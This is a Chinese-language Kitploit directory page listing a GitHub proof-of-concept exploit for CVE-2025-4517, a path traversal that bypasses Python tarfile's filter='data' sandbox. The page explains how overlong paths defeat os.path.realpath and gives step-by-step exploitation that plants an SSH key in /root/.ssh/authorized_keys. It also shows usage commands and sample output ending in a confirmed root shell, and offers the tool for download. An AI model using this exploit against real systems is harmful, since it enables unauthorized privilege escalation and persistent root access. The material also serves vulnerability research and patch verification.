Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4517-Python-tarfile-filter-data-Bypass-PoC — Python 的 tarfile 中的路径遍历漏洞。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2025-4517-python-tarfile-filter-data-bypass-poc
权限提升漏洞分析漏洞利用渗透测试红队Payload 开发
GitHubestebanzarate/cve-2025-4517-python-tarfile-filter-data-bypass-poc

CVE-2025-4517-Python-tarfile-filter-data-Bypass-PoC

Python 的 tarfile 中的路径遍历漏洞。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

CVE-2025-4517 — Python tarfile filter="data" 绕过(PoC)

Python tarfile 模块中的路径遍历漏洞,影响 3.8.0 至 3.13.1 版本。filter="data" 沙箱旨在防止不安全的解压操作,但可通过构造超过 PATH_MAX(4096 字节)的路径来绕过,导致 os.path.realpath() 静默停止解析符号链接。安全检查看到的是一个看似安全的路径,而内核解析的是真实路径,从而允许在解压目录之外写入文件。此 PoC 利用该绕过方式将 SSH 公钥写入 /root/.ssh/authorized_keys。


工作原理

  1. 构建一个包含深层嵌套目录(247 字符名称)的恶意 tar 包,使符号链接路径超过 PATH_MAX。
  2. filter="data" 调用 os.path.realpath() 验证每个路径——但在 PATH_MAX 处它停止解析,并认为该路径仍位于暂存目录内。检查通过。
  3. 解压时内核正确解析完整路径,从而逃逸沙箱。
  4. 一个普通文件通过被绕过的符号链接链写入,最终落在 /root/.ssh/authorized_keys。
  5. 使用注入的密钥验证以 root 身份进行 SSH 访问。

要求

  • Python 3
  • 可用的 ssh-keygen(或使用 -k 提供您自己的公钥)
  • 对易受攻击脚本所使用的备份目录具有写权限
  • 具有触发易受攻击解压操作的 sudo 权限

用法

root@kitploit:~
# 自动生成新的密钥对
python3 exploit.py

# 使用现有的公钥
python3 exploit.py -k ~/.ssh/id_ed25519.pub

示例:

root@kitploit:~
$ python3 exploit.py
[+] SSH keypair generated: /tmp/cve_2025_4517_key
[*] Creating exploit tar...
[+] Exploit tar created: /tmp/cve_2025_4517_exploit.tar
[*] Deploying exploit to: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit deployed successfully
[*] Triggering extraction via vulnerable script...
[+] Extraction completed
[*] Verifying exploit via SSH...
[+] SUCCESS! SSH as root confirmed: uid=0(root) gid=0(root) groups=0(root)

============================================================
[+] EXPLOITATION SUCCESSFUL!
[+] SSH into root with: ssh -i /tmp/cve_2025_4517_key root@localhost
============================================================

[?] Open root shell now? (y/n):

参考

  • CVE-2025-4517
  • Python tarfile 文档 — 解压过滤器
  • Python 安全公告

致谢

  • 发现者: Python 安全响应团队
  • 清理与简化: Esteban Zárate
下载工具